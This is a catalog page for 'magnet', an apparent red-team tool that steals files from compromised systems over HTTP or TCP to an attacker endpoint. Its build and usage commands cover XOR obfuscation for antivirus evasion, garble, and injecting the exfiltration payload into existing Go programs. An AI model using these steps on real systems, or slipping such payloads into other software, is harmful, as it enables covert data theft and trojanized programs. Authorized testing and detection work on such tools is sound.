Primary Use Case

This tool is designed for penetration testers and red teamers to covertly extract valuable files from compromised systems during assessments. It enables stealthy data exfiltration by embedding the payload into Go programs or using a standalone binary, making detection by security systems more difficult.

Key Features

Cross-platform support (Windows, macOS, Linux)

Stealthy exfiltration of files via HTTP or TCP

Ability to inject payload into existing Go programs

Standalone executable for quick deployment

Basic encryption/obfuscation of embedded files and endpoints to evade detection

Integration with lobfuscator for XOR-based encryption

Supports environment variable configuration at compile time

Recommendations for further binary obfuscation using garble

Insights & Recommendations

This tool is intended strictly for educational purposes or authorized penetration testing engagements. The encryption used is basic XOR to evade antivirus detection, not for strong cryptographic security. Users should configure endpoints carefully and consider additional obfuscation (e.g., garble) to enhance stealth. Error messages are suppressed by default to maintain stealth but can be enabled with a hidden debug flag.

Installation

Build lobfuscator tool: `make build.lobfuscator`
Ensure lobfuscator is in your PATH
Build magnet standalone binary with: `./build.sh $FILES $ENDPOINT $KEY $METHOD`
Set environment variables for key, files, endpoint, and method before build
Optionally inject magnet into your Go program by importing and initializing it
Compile Go program with ldflags to embed configuration variables
Use garble to further obfuscate the binary if desired

Usage

export KEY=[YOUR_KEY]

Set the encryption key for obfuscating files and endpoints.

export FILES=[FILENAME]

Specify the list of files to exfiltrate.

export ENDPOINT=[ATTACKER_ENDPOINT]

Define the remote HTTP or TCP endpoint to receive exfiltrated data.

export METHOD=[EXFILTRATION_METHOD]

Choose the exfiltration protocol, either 'http' or 'tcp'.

cat [FILE] | lobfuscator $KEY > obfuscated.txt

Encrypt a file list using lobfuscator with the specified key.

./build.sh $FILES $ENDPOINT $KEY $METHOD

Build the standalone magnet binary with embedded encrypted configuration.

Add magnet import and variables in Go program, then call magnet.Magnet() in main()

Inject magnet payload into a Go program for stealthy exfiltration.

go build -ldflags "-X 'main.FileList=$FILES' -X 'main.Key=$KEY' -X 'main.Endpoint=$ENDPOINT' -X 'main.Method=$METHOD'" -o output_binary

Compile Go program embedding magnet configuration variables.

Smart Usage Notes

Integrate magnet with custom C2 frameworks to enhance stealthy exfiltration capabilities.Use magnet during red team exercises to simulate advanced data theft scenarios and test blue team detection.Combine magnet with binary obfuscation tools like garble to further evade static detection by endpoint security.Leverage magnet’s environment variable configuration for dynamic payload customization during engagements.Develop blue team detection rules focusing on anomalous outbound HTTP/TCP connections from uncommon executables.

OpenSec Atlas

magnet

About This Tool

Primary Use Case

Key Features

Insights & Recommendations

Installation

Usage

Smart Usage Notes

Security Capability Profile

Tags

You Might Also Like